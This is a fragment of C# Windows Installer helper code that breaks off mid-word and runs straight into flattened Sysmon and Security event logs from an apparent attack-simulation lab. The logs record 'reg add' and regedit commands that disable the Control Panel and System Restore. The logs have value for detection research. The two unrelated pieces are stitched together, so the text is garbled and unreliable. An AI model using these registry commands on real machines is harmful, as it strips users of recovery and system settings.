fullNameLength = 0; UInt32 res = NativeMethods.PackageFullNameFromId(id, ref fullNameLength, null); if (res != 122) // ERROR_INSUFFICIENT_BUFFER throw new Win32Exception((int)res); StringBuilder fullName = new StringBuilder((int)fullNameLength); res = NativeMethods.PackageFullNameFromId(id, ref fullNameLength, fullName); if (res != 0) throw new Win32Exception((int)res); return fullName.ToString(); } } public class MsiHelper { public static UInt32 SUMMARY_PID_TEMPLATE = 7; public static UInt32 SUMMARY_PID_REVNUMBER = 9; private static Guid MSI_CLSID = new Guid("000c1084-0000-0000-c000-000000000046"); private static Guid MSP_CLSID = new Guid("000c1086-0000-0000-c000-000000000046"); public static IEnumerable<PatchInfo> EnumPatches(string productCode, string userSid, InstallContext context, PatchState filter) { // PowerShell -> .NET, $null for a string parameter becomes an empty string, make sure we convert back. productCode = String.IsNullOrEmpty(productCode) ? null : productCode; userSid = String.IsNullOrEmpty(userSid) ? null : userSid; UInt32 idx = 0; while (true) { StringBuilder targetPatchCode = new StringBuilder(39); StringBuilder targetProductCode = new StringBuilder(39); InstallContext targetContext; StringBuilder targetUserSid = new StringBuilder(0); UInt32 targetUserSidLength = 0; UInt32 res = NativeMethods.MsiEnumPatchesExW(productCode, userSid, context, filter, idx, targetPatchCode, targetProductCode, out targetContext, targetUserSid, ref targetUserSidLength); SecurityIdentifier sid = null; if (res == 0x000000EA) // ERROR_MORE_DATA { targetUserSidLength++; targetUserSid.EnsureCapacity((int)targetUserSidLength); res = NativeMethods.MsiEnumPatchesExW(productCode, userSid, context, filter, idx, targetPatchCode, targetProductCode, out targetContext, targetUserSid, ref targetUserSidLength); sid = new SecurityIdentifier(targetUserSid.ToString()); } if (res == 0x00000103) // ERROR_NO_MORE_ITEMS break; else if (res != 0) throw new Win32Exception((int)res); yield return new PatchInfo() { PatchCode = targetPatchCode.ToString(), ProductCode = targetProductCode.ToString(), Context = targetContext, UserSid = sid, }; idx++; } } public static string GetPatchInfo(string patchCode, string productCode, string userSid, InstallContext context, string property) { // PowerShell -> .NET, $null for a string parameter becomes an empty string, make sure we convert back. userSid = String.IsNullOrEmpty(userSid) ? null : userSid; StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiGetPatchInfoExW(patchCode, productCode, userSid, context, property, buffer, ref bufferLength); bufferLength++; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiGetPatchInfoExW(patchCode, productCode, userSid, context, property, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static string GetProperty(SafeMsiHandle productHandle, string property) { StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiGetPropertyW(productHandle, property, buffer, ref bufferLength); // Make sure we include the null byte char at the end. bufferLength += 1; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiGetPropertyW(productHandle, property, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static SafeMsiHandle GetSummaryHandle(string databasePath) { SafeMsiHandle summaryInfo = null; UInt32 res = NativeMethods.MsiGetSummaryInformationW(IntPtr.Zero, databasePath, 0, out summaryInfo); if (res != 0) throw new Win32Exception((int)res); return summaryInfo; } public static string GetSummaryPropertyString(SafeMsiHandle summaryHandle, UInt32 propertyId) { UInt32 dataType = 0; Int32 intPropValue = 0; System.Runtime.InteropServices.ComTypes.FILETIME propertyFiletime = new System.Runtime.InteropServices.ComTypes.FILETIME(); StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiSummaryInfoGetPropertyW(summaryHandle, propertyId, out dataType, out intPropValue, ref propertyFiletime, buffer, ref bufferLength); // Make sure we include the null byte char at the end. bufferLength += 1; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiSummaryInfoGetPropertyW(summaryHandle, propertyId, out dataType, out intPropValue, ref propertyFiletime, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static bool IsMsi(string filename) { return GetClsid(filename) == MSI_CLSID; } public static bool IsMsp(string filename) { return GetClsid(filename) == MSP_CLSID; } public static SafeMsiHandle OpenPackage(string packagePat519032b7-e4d2-493b-9785-782bca62694d 13241300x80000000000000004759Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:07:08.734{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanelDWORD (0x00000001)ATTACKRANGE\Administrator 13241300x80000000000000004752Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:06:36.112{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanelDWORD (0x00000000)ATTACKRANGE\Administrator 12241200x80000000000000004746Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2024-02-01 23:05:26.469{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanelATTACKRANGE\Administrator 13241300x80000000000000004739Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:04:40.029{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel1ATTACKRANGE\Administrator 13241300x80000000000000004737Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:04:18.236{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel(Empty)ATTACKRANGE\Administrator 4688201331200x8020000000000000386283Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x18ca4b0xec0C:\Windows\System32\reg.exe%%19360x15c8reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 2 /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000002668Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-2024-02-01 22:58:31.935{7A09209E-2217-65BC-5004-000000004703}3776C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 2 /fC:\Users\Administrator\AR-WIN-2\Administrator{7A09209E-1DA2-65BC-4BCA-180000000000}0x18ca4b2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{7A09209E-1DB7-65BC-BA03-000000004703}5576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" AR-WIN-2\Administrator 154100x80000000000000002667Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-2024-02-01 22:58:19.803{7A09209E-220B-65BC-4F04-000000004703}3780C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explore" /v NoControlPanel /t REG_DWORD /d 2 /fC:\Users\Administrator\AR-WIN-2\Administrator{7A09209E-1DA2-65BC-4BCA-180000000000}0x18ca4b2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{7A09209E-1DB7-65BC-BA03-000000004703}5576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" AR-WIN-2\Administrator 4688201331200x8020000000000000386282Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x18ca4b0xec4C:\Windows\System32\reg.exe%%19360x15c8reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explore" /v NoControlPanel /t REG_DWORD /d 2 /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000002647Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-2024-02-01 22:55:51.801{7A09209E-2177-65BC-3A04-000000004703}1548C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 2 /fC:\Users\Administrator\AR-WIN-2\Administrator{7A09209E-1DA2-65BC-4BCA-180000000000}0x18ca4b2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{7A09209E-1DB7-65BC-BA03-000000004703}5576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" AR-WIN-2\Administrator 4688201331200x8020000000000000386261Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x18ca4b0x60cC:\Windows\System32\reg.exe%%19360x15c8reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 2 /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x8020000000000000386260Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x18ca4b0xa54C:\Windows\System32\reg.exe%%19360x15c8reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 2 /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000002646Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-2024-02-01 22:55:46.068{7A09209E-2172-65BC-3904-000000004703}2644C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 2 /fC:\Users\Administrator\AR-WIN-2\Administrator{7A09209E-1DA2-65BC-4BCA-180000000000}0x18ca4b2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{7A09209E-1DB7-65BC-BA03-000000004703}5576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" AR-WIN-2\Administrator 154100x80000000000000002645Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-2024-02-01 22:55:24.459{7A09209E-215C-65BC-3804-000000004703}6112C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d /fC:\Users\Administrator\AR-WIN-2\Administrator{7A09209E-1DA2-65BC-4BCA-180000000000}0x18ca4b2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{7A09209E-1DB7-65BC-BA03-000000004703}5576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" AR-WIN-2\Administrator 4688201331200x8020000000000000386259Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x18ca4b0x17e0C:\Windows\System32\reg.exe%%19360x15c8reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000002634Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-2024-02-01 22:53:29.800{7A09209E-20E9-65BC-2D04-000000004703}3712C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /fC:\Users\Administrator\AR-WIN-2\Administrator{7A09209E-1DA2-65BC-4BCA-180000000000}0x18ca4b2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{7A09209E-1DB7-65BC-BA03-000000004703}5576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" AR-WIN-2\Administrator 4688201331200x8020000000000000386248Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x18ca4b0xe80C:\Windows\System32\reg.exe%%19360x15c8reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 13241300x80000000000000004875Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:25:44.847{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSRDWORD (0x00000001)ATTACKRANGE\Administrator 12241200x80000000000000004873Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2024-02-01 23:25:01.756{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\New Value #1ATTACKRANGE\Administrator 13241300x80000000000000004872Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:25:01.756{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSRDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000004867Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:24:52.213{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\New Value #1DWORD (0x00000000)ATTACKRANGE\Administrator 14241400x80000000000000004866Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashRenameKey2024-02-01 23:24:41.729{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\New Key #1HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestoreATTACKRANGE\Administrator